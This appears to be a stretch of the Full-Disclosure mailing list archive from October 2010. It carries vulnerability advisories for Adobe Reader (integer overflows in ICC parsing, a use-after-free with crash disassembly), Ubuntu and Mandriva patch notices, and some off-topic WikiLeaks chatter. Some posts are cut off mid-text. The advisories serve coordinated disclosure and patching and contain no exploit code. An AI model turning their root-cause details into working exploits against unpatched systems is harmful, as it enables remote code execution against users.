Re: [Full-disclosure] ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability
> > Well, awesome. This sounds near-identical to some issues that the Sun JRE > had a few years back[1]. I wonder if the code shares a common lineage? :) > > No common lineage required; ICC's filled with 32 bit element counts. They're always int overflow bait. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability
On Wed, Oct 6, 2010 at 11:28 AM, ZDI Disclosures < zdi-disclosu...@tippingpoint.com> wrote: > ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability > http://www.zerodayinitiative.com/advisories/ZDI-10-191 > October 6, 2010 > > -- CVE ID: > CVE-2010-3621 > > -- CVSS: > 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) > > -- Affected Vendors: > Adobe > > -- Affected Products: > Adobe Reader > > -- Vulnerability Details: > This vulnerability allows remote attackers to execute arbitrary code on > vulnerable installations of Adobe Reader. User interaction is required > in that a target must be coerced into opening a file or visiting a web > page. > > The specific flaw exists within the ACE.dll module responsible for > parsing ICC streams. When processing an ICC stream, the process performs > math on two DWORD values from the input file. If these values wrap over > the maximum integer value of 0x a mis-allocation can occur. > Later, the process uses one of the original DWORD values as a size to a > copy function. This can be abused by an attacker to overflow a stack > buffer and subsequently execute code under the context of the user > running the process. > Well, awesome. This sounds near-identical to some issues that the Sun JRE had a few years back[1]. I wonder if the code shares a common lineage? :) Cheers Chris [1] - http://scary.beasts.org/security/CESA-2006-004.html http://scary.beasts.org/misc/jdk/badicc.jpg (And additional integer problems not released at the time) http://scary.beasts.org/misc/jdk/badicc2.jpg http://scary.beasts.org/misc/jdk/badicc3.jpg http://scary.beasts.org/misc/jdk/badicc4.jpg http://scary.beasts.org/security/CESA-2007-005.html In addition, there have been plenty of bugs against lcms[2] and Apple's ICC profile parser. So it seems like ICC profile parsing is hard ;-) [2] - http://scary.beasts.org/security/CESA-2009-003.html > -- Vendor Response: > Adobe has issued an update to correct this vulnerability. More > details can be found at: > > http://www.adobe.com/support/security/bulletins/apsb10-21.html > > -- Disclosure Timeline: > 2010-06-23 - Vulnerability reported to vendor > 2010-10-06 - Coordinated public release of advisory > > -- Credit: > This vulnerability was discovered by: >* Sebastian Apelt (www.siberas.de) > > -- About the Zero Day Initiative (ZDI): > Established by TippingPoint, The Zero Day Initiative (ZDI) represents > a best-of-breed model for rewarding security researchers for responsibly > disclosing discovered vulnerabilities. > > Researchers interested in getting paid for their security research > through the ZDI can find more information and sign-up at: > >http://www.zerodayinitiative.com > > The ZDI is unique in how the acquired vulnerability information is > used. TippingPoint does not re-sell the vulnerability details or any > exploit code. Instead, upon notifying the affected product vendor, > TippingPoint provides its customers with zero day protection through > its intrusion prevention technology. Explicit details regarding the > specifics of the vulnerability are not exposed to any parties until > an official vendor patch is publicly available. Furthermore, with the > altruistic aim of helping to secure a broader user base, TippingPoint > provides this vulnerability information confidentially to security > vendors (including competitors) who have a vulnerability protection or > mitigation product. > > Our vulnerability disclosure policy is available online at: > >http://www.zerodayinitiative.com/advisories/disclosure_policy/ > > Follow the ZDI on Twitter: > >http://twitter.com/thezdi > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WikiLeaks
Two days ago I managed to find somebody ("Anny") on their web chat.
She didn't say much, only that it's supposed to be up in a week or so
and that the issues are technical vs. political.
I still believe it smells of fish.
And to kinda paraphrase: Just because J Assange is a raving paranoid
doesn't mean they aren't out to get him...
-h
Am 06.10.2010 20:06, schrieb Juha-Matti Laurio:
> It's the newest tweet still.
>
> Juha-Matti
>
> Jeffrey Walton [noloa...@gmail.com] kirjoitti:
>> The latest is kind of funny ("Latest smear attempt: Chinese spy agency
>> gave WikiLeaks $20M").
>>
>> Just call it a 'PAC Contribution' and everything will be fine.
>>
>> On Mon, Oct 4, 2010 at 7:05 AM, Juha-Matti Laurio
>> wrote:
>> > And nothing related is not tweeted at
>> > http://twitter.com/wikileaks
>> >
>> > Juha-Matti
>> >
>> > Harry Behrens [ha...@behrens.com] kirjoitti:
>> >> for 5 days and nothing about this to be found on google.
>> >>
>> >> Does anybody have an idea what is happening here - it does smell
>> >> slightly fishy...
>> >>
>> >> -h
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WikiLeaks
I'm not sure why everyone is so fussed about this tbh..
And surely, full-disclosure is no place for such a discussion either..
On 06/10/2010 19:06, Juha-Matti Laurio wrote:
> It's the newest tweet still.
>
> Juha-Matti
>
> Jeffrey Walton [noloa...@gmail.com] kirjoitti:
>> The latest is kind of funny ("Latest smear attempt: Chinese spy agency
>> gave WikiLeaks $20M").
>>
>> Just call it a 'PAC Contribution' and everything will be fine.
>>
>> On Mon, Oct 4, 2010 at 7:05 AM, Juha-Matti Laurio
>> wrote:
>>> And nothing related is not tweeted at
>>> http://twitter.com/wikileaks
>>>
>>> Juha-Matti
>>>
>>> Harry Behrens [ha...@behrens.com] kirjoitti:
for 5 days and nothing about this to be found on google.
Does anybody have an idea what is happening here - it does smell
slightly fishy...
-h
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Massive Black Hat Seo Campaign in progress ?
Hi to all, I posted something about a massive black hat seo campaign that seem in progress. If you are interested check http://extraexploit.blogspot.com/2010/10/dollars-javascript-code-yet-another_06.html and http://extraexploit.blogspot.com/2010/10/dollars-javascript-code-yet-another.html Feedback are welcome. Thank your very much to all for attention. -- http://extraexploit.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-193: Adobe Acrobat Reader Multimedia Playing Remote Code Execution Vulnerability
ZDI-10-193: Adobe Acrobat Reader Multimedia Playing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-193 October 6, 2010 -- CVE ID: CVE-2010-3632 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Acrobat -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10538. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the application explicitly trusting a string's length embedded within a particular file format. The application will duplicate an arbitrarily sized string into a statically sized buffer located on the stack. This can lead to code execution under the context of the application. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-21.html -- Disclosure Timeline: 2010-08-25 - Vulnerability reported to vendor 2010-10-06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-192: Adobe Acrobat Reader ICC mluc Remote Code Execution Vulnerability
ZDI-10-192: Adobe Acrobat Reader ICC mluc Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-192 October 6, 2010 -- CVE ID: CVE-2010-3622 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Reader -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required in that a target must be coerced into opening a file or visiting a web page. The specific flaw exists within the ACE.dll module responsible for parsing ICC streams. Within the 'desc' tag there exists an embedded 'mluc' data structure. The code within ACE performs arithmetic on the second DWORD from the mluc structure and a value from the desc structure. The resulting integer is used for an allocation of a heap-based buffer. An attacker can forge these values to force the process to under-allocate this buffer and later overflow it during a copy operation. This leads to remote code execution under the context of the user running the application. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-21.html -- Disclosure Timeline: 2010-06-23 - Vulnerability reported to vendor 2010-10-06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sebastian Apelt (www.siberas.de) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability
ZDI-10-191: Adobe Reader ICC Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-191 October 6, 2010 -- CVE ID: CVE-2010-3621 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Reader -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required in that a target must be coerced into opening a file or visiting a web page. The specific flaw exists within the ACE.dll module responsible for parsing ICC streams. When processing an ICC stream, the process performs math on two DWORD values from the input file. If these values wrap over the maximum integer value of 0x a mis-allocation can occur. Later, the process uses one of the original DWORD values as a size to a copy function. This can be abused by an attacker to overflow a stack buffer and subsequently execute code under the context of the user running the process. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-21.html -- Disclosure Timeline: 2010-06-23 - Vulnerability reported to vendor 2010-10-06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Sebastian Apelt (www.siberas.de) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WikiLeaks
It's the newest tweet still.
Juha-Matti
Jeffrey Walton [noloa...@gmail.com] kirjoitti:
> The latest is kind of funny ("Latest smear attempt: Chinese spy agency
> gave WikiLeaks $20M").
>
> Just call it a 'PAC Contribution' and everything will be fine.
>
> On Mon, Oct 4, 2010 at 7:05 AM, Juha-Matti Laurio
> wrote:
> > And nothing related is not tweeted at
> > http://twitter.com/wikileaks
> >
> > Juha-Matti
> >
> > Harry Behrens [ha...@behrens.com] kirjoitti:
> >> for 5 days and nothing about this to be found on google.
> >>
> >> Does anybody have an idea what is happening here - it does smell
> >> slightly fishy...
> >>
> >> -h
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (CORE-2010-0701) Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability 1. *Advisory Information* Title: Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability Advisory Id: CORE-2010-0701 Advisory URL: [http://www.coresecurity.com/content/adobe-acrobat-acrord23-reader-use-after-free] Date published: 2010-10-05 Date of last update: 2010-10-05 Vendors contacted: Adobe Release mode: Coordinated release 2. *Vulnerability Information* Class: Use after free [CWE-416] Impact: Code execution Remotely Exploitable: Yes (client-side) Locally Exploitable: No CVE Name: CVE-2010-3627 Bugtraq ID: N/A 3. *Vulnerability Description* Adobe Acrobat Reader is prone to a use-after-free vulnerability due to an invalid usage of a released memory chunk. This vulnerability could be used by a remote attacker to execute arbitrary code, by enticing the user of Adobe Acrobat Reader to open a specially crafted file and click on PAGES thumbnails. 4. *Vulnerable packages* . Adobe Acrobat Reader 9.x 5. *Non-vulnerable packages* . Adobe Acrobat Reader 8.x 6. *Solutions and Workarounds* For further information about this issue look at the Adobe Security Bulletin and security blogs: . Adobe Security Bulletins and Advisories: [http://www.adobe.com/support/security]. . PSIRT blog: [http://blogs.adobe.com/psirt]. 7. *Credits* This vulnerability was discovered and researched by Ricardo Narvaja, from Core Security Technologies. This publication was coordinated by Fernando Russ. 8. *Technical Description* Adobe Acrobat Reader is prone to a use-after-free vulnerability due to an invalid usage of a released memory chunk. A specially crafted '.pdf' file containing special flash code triggers an 'ACCESS_VIOLATION' reading at address 0x0030. A more careful analysis of that code indicates that ESI points to a released chunk of memory. Exploitation is feasible forcing the allocation process of Adobe Acrobat Reader to reuse the chunk pointed by ESI with specially controlled data. /- 00EE10F8MOV ECX,DWORD PTR DS:[ESI+1C] <-- ESI points to a previously released memory chunk. 00EE10FBMOV DWORD PTR SS:[EBP+78],EAX 00EE10FEMOV EAX,DWORD PTR DS:[ESI+18] 00EE1101PUSH EAX 00EE1102CALL DWORD PTR DS:[ECX+30] <-- The execution flow depends on the content of ECX. (ECX dependes on ESI) - -/ The content of the CPU register while an 'ACCESS_VIOLATION' reading was triggered at 0x00EE1102, /- EAX ECX EDX 014D0A40 EBX ESP 0013F1BC EBP 0013F24C ESI 02D5782C EDI 10A7C3D0 EIP 00EE1102 - -/ This vulnerability could result in arbitrary code execution, although it was not verified. 9. *Report Timeline* . 2010-07-05: Core Security Technologies notifies the Adobe team of the vulnerability and announces its initial plan to publish the advisory on July 26th, 2010. A Proof of Concept (PoC) was sent to Adobe team. . 2010-07-06: Adobe team acknowledges Core Security Technologies' e-mail. Vendor also notifies that their world-wide offices will be shut down from July 5th to July 11th, and it may take a bit longer than usual to investigate this issue. . 2010-07-22: Core asks for a status update about this issue. . 2010-07-22: Adobe team notifies that they have reproduced the issue and expect the fix to be available in the next quarterly security update for Acrobat and Adobe Reader. These fixes are currently scheduled for an October patch Tuesday release. . 2010-07-26: Core notifies that the publication date for this advisory was re-scheduled to October 12th, 2010. . 2010-07-27: Core notifies that the publication date of October 12th, 2010 should be considered as final. If Adobe team does not release a patch on that day, Core will be forced to release this advisory in user-release mode. . 2010-09-28: Core notifies that the publication date of October 12th, 2010 is still valid and asks for a status update. . 2010-09-29: Adobe acknowledges the communication by informing that the publication date was re-scheduled to October 5th, 2010. . 2010-10-04: Core asks if the Adobe team has an assigned CVE identifier for this vulnerability and which are the affected versions of Adobe Reader. . 2010-10-04: Adobe notifies that: . This issue affects Reader 9.x, but not Reader 8.x. . The assigned identifier for this vulnerability is CVE-2010-3627. . 2010-10-05: Core publishes advisory CORE-2010-0701. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vu
[Full-disclosure] [USN-1001-1] LVM2 vulnerability
=== Ubuntu Security Notice USN-1001-1 October 06, 2010 lvm2 vulnerability CVE-2010-2526 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: clvm2.02.02-1ubuntu1.6 Ubuntu 8.04 LTS: clvm2.02.26-1ubuntu9.1 Ubuntu 9.04: clvm2.02.39-0ubuntu9.1 Ubuntu 9.10: clvm2.02.39-0ubuntu11.1 Ubuntu 10.04 LTS: clvm2.02.54-1ubuntu4.1 In general, a standard system update will make all the necessary changes. In a clustering environment, you need to restart clvmd after the update. Details follow: The cluster logical volume manager daemon (clvmd) in LVM2 did not correctly validate credentials. A local user could use this flaw to manipulate logical volumes without root privileges and cause a denial of service in the cluster. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6.diff.gz Size/MD5:23084 0b3f64de96c9b259a6ef2769946f1e23 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6.dsc Size/MD5: 798 2005fade3f0eab833f8dc298dff25dc4 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02.orig.tar.gz Size/MD5: 477665 e5dfc205aaf673fecb3c1c15164d718c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_amd64.deb Size/MD5: 193890 fc1605c8d8358720167cc587b4c6e750 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_amd64.udeb Size/MD5: 198688 b34a16e5e6d7132690bc795b4462db6a http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_amd64.deb Size/MD5: 302348 afc947cfd64a2cf764ac824df3aa6714 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_i386.deb Size/MD5: 173624 2b7808f8cf8c3d04510514cac0e1e32a http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_i386.udeb Size/MD5: 171898 6ff8ce5077fc3ffa52facd8327ff8c30 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_i386.deb Size/MD5: 279694 ee0be92486aad4c98655ffeabb9066e6 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_powerpc.deb Size/MD5: 197078 bf2848d3a77e6fdef5bf3fd72ce4c97d http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_powerpc.udeb Size/MD5: 189558 43368dbc246f5ccf7bbe5f837ff607d4 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_powerpc.deb Size/MD5: 305146 2bf0804f159411ebd16ece0e1f4c3e88 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.02-1ubuntu1.6_sparc.deb Size/MD5: 192050 7bfe11bf05d122ace63b13bc097d02b1 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.02-1ubuntu1.6_sparc.udeb Size/MD5: 195832 0d0fc85a2db41997003d64ee2b97c11f http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.02-1ubuntu1.6_sparc.deb Size/MD5: 301914 08c3ec1d2b497c0ea7dacbf60e8bd00a Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26-1ubuntu9.1.diff.gz Size/MD5:17226 7ad064c5e17a791ea9ff7138a8b43b8b http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26-1ubuntu9.1.dsc Size/MD5: 875 19693df12de08471c95d38b7125ddb52 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26.orig.tar.gz Size/MD5: 532355 caa50b5ebd4f27ba57836a805f49e6da amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.26-1ubuntu9.1_amd64.deb Size/MD5: 212496 fdbd428da1cc23930edb747344f1e614 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2-udeb_2.02.26-1ubuntu9.1_amd64.udeb Size/MD5: 219252 913d218ec8a6f69b2fec929819eb3ef5 http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/lvm2_2.02.26-1ubuntu9.1_amd64.deb Size/MD5: 333082 6ba529db36ba122830ea7ef38b59110d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/lvm2/clvm_2.02.26-1ubuntu9.1_i386.deb Size/MD5: 202906 6f5d873b18820bce3d709b97fef42e8d http://security.ubuntu.com/ubuntu/p
Re: [Full-disclosure] Webserver-Security and Virtualization
In data mercoledì 6 ottobre 2010 13:40:49, Marcel Grabher (sallas) ha scritto: > i m working on a paper about Webserver-Security (free). > Objective: One should know about the risks and what can be done to mitigate > them. > http://webservsec.blogspot.com/2010/10/threats.html I'm missing the virtualization part here. BTW, I'm not sure a simple box model can capture all the complex threats involved... @paradoxengine ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:197 ] postgresql
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:197 http://www.mandriva.com/security/ ___ Package : postgresql Date: October 6, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities was discovered and corrected in postgresql: An authenticated database user can manipulate modules and tied variables in some external procedural languages to execute code with enhanced privileges (CVE-2010-3433). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 This update provides a solution to these vulnerabilities. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3433 ___ Updated Packages: Mandriva Linux 2008.0: 732b926f0654f432eb9520fc4b4d3f63 2008.0/i586/libecpg5-8.2.18-0.1mdv2008.0.i586.rpm 584ad08b4fd7e237172a90837fcf3dc5 2008.0/i586/libecpg-devel-8.2.18-0.1mdv2008.0.i586.rpm 340e166ffca9a8758c6512959f770571 2008.0/i586/libpq5-8.2.18-0.1mdv2008.0.i586.rpm c95169706bc5d0dd7520bdece5354e0a 2008.0/i586/libpq-devel-8.2.18-0.1mdv2008.0.i586.rpm 01e463f712ca216306d56e77a3a9bd12 2008.0/i586/postgresql-8.2.18-0.1mdv2008.0.i586.rpm e7e9dcf8fcc7cb691066b0e1c8e84b08 2008.0/i586/postgresql8.2-8.2.18-0.1mdv2008.0.i586.rpm 5061d2dd0192413f6538400719906225 2008.0/i586/postgresql8.2-contrib-8.2.18-0.1mdv2008.0.i586.rpm e31e99d6cf860d3362c10845014a12fa 2008.0/i586/postgresql8.2-devel-8.2.18-0.1mdv2008.0.i586.rpm 769ec11c6555dedd93012a1b92ebce68 2008.0/i586/postgresql8.2-docs-8.2.18-0.1mdv2008.0.i586.rpm c8ac9f1032f924bee487d368b73a7f5f 2008.0/i586/postgresql8.2-pl-8.2.18-0.1mdv2008.0.i586.rpm b67bcbc72ae5807430cdcbc355c1b185 2008.0/i586/postgresql8.2-plperl-8.2.18-0.1mdv2008.0.i586.rpm ac8c444bddb034a172cce9490edf4f81 2008.0/i586/postgresql8.2-plpgsql-8.2.18-0.1mdv2008.0.i586.rpm 30223c2e6a478f2b02331541a9d56b0c 2008.0/i586/postgresql8.2-plpython-8.2.18-0.1mdv2008.0.i586.rpm 7ee4f67b04d3f4859a4d098a882894d2 2008.0/i586/postgresql8.2-pltcl-8.2.18-0.1mdv2008.0.i586.rpm edf93c75a046749a0f74b900eb11bc3c 2008.0/i586/postgresql8.2-server-8.2.18-0.1mdv2008.0.i586.rpm e3428e4a188bf6861c259b06deaee4ae 2008.0/i586/postgresql8.2-test-8.2.18-0.1mdv2008.0.i586.rpm 148d3cf6d7fd17b537574bf161595eb8 2008.0/i586/postgresql-devel-8.2.18-0.1mdv2008.0.i586.rpm 8235eaa37082469e5dd9146010eb2b3b 2008.0/SRPMS/postgresql8.2-8.2.18-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 8e005a4499089d4be1633c2767fceb3e 2008.0/x86_64/lib64ecpg5-8.2.18-0.1mdv2008.0.x86_64.rpm 5a5ed7202e7878652e2bc098b34acb51 2008.0/x86_64/lib64ecpg-devel-8.2.18-0.1mdv2008.0.x86_64.rpm 13de1a6c3c00123fd7dddfbe1d43cc27 2008.0/x86_64/lib64pq5-8.2.18-0.1mdv2008.0.x86_64.rpm 36e4c6537d3fa79a9358bd9e215928aa 2008.0/x86_64/lib64pq-devel-8.2.18-0.1mdv2008.0.x86_64.rpm 385d12eec49ef02c6cb80df69eb56d33 2008.0/x86_64/postgresql-8.2.18-0.1mdv2008.0.x86_64.rpm 62c87aa7c1d7c1f3cbf1bb2ae7f4501d 2008.0/x86_64/postgresql8.2-8.2.18-0.1mdv2008.0.x86_64.rpm fba961f1816631c00de3a5d28c661520 2008.0/x86_64/postgresql8.2-contrib-8.2.18-0.1mdv2008.0.x86_64.rpm 41fd6f6e5787eb24bd40e4a01b8e9bca 2008.0/x86_64/postgresql8.2-devel-8.2.18-0.1mdv2008.0.x86_64.rpm 22fa656db75da6a9c8405eddc1b92c60 2008.0/x86_64/postgresql8.2-docs-8.2.18-0.1mdv2008.0.x86_64.rpm df1364c07ff56a61d022d9074c15ae89 2008.0/x86_64/postgresql8.2-pl-8.2.18-0.1mdv2008.0.x86_64.rpm f2bcaf5a19ab9fb09073254ad02b7fac 2008.0/x86_64/postgresql8.2-plperl-8.2.18-0.1mdv2008.0.x86_64.rpm 4e46a8cc010467e5e0c874f5033a7dbb 2008.0/x86_64/postgresql8.2-plpgsql-8.2.18-0.1mdv2008.0.x86_64.rpm 93d79de66e75dc93d7d537b32609d8d1 2008.0/x86_64/postgresql8.2-plpython-8.2.18-0.1mdv2008.0.x86_64.rpm 383b49120038dd7fdd159eb539001aa7 2008.0/x86_64/postgresql8.2-pltcl-8.2.18-0.1mdv2008.0.x86_64.rpm abb559451cca4510884b42b443af75d7 2008.0/x86_64/postgresql8.2-server-8.2.18-0.1mdv2008.0.x86_64.rpm 54fd4dd2f83fa0ce9f10e8ae826fa935 2008.0/x86_64/postgresql8.2-test-8.2.18-0.1mdv2008.0.x86_64.rpm 6e9f4cbe5d4a73e599c8f255828f94c7 2008.0/x86_64/postgresql-devel-8.2.18-0.1mdv2008.0.x86_64.rpm 8235eaa37082469e5dd9146010eb2b3b 2008.0/SRPMS/postgresql8.2-8.2.18-0.1mdv2008.0.src.rpm Mandriva Linux 2009.0: d9c0f389520424306586d57c36eb875e 2009.0/i586/libecpg8.3_6-8.3.12-0.1mdv2009.0.i586.rpm 467f9f37e156f2a03d2e4ba55b75ee51 2009.0/i586/libpq8.3_5-8.3.12-0.1mdv2009.0.i58
[Full-disclosure] Webserver-Security and Virtualization
Hi, i m working on a paper about Webserver-Security (free). Objective: One should know about the risks and what can be done to mitigate them. The pictured topics are Threats and Countermeasures structured in Network, OS, Service, App http://webservsec.blogspot.com/2010/10/threats.html http://webservsec.blogspot.com/2010/10/countermeasures.html I would really appreciate some comments to the graphics Probably I forgot about something. BG MG ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
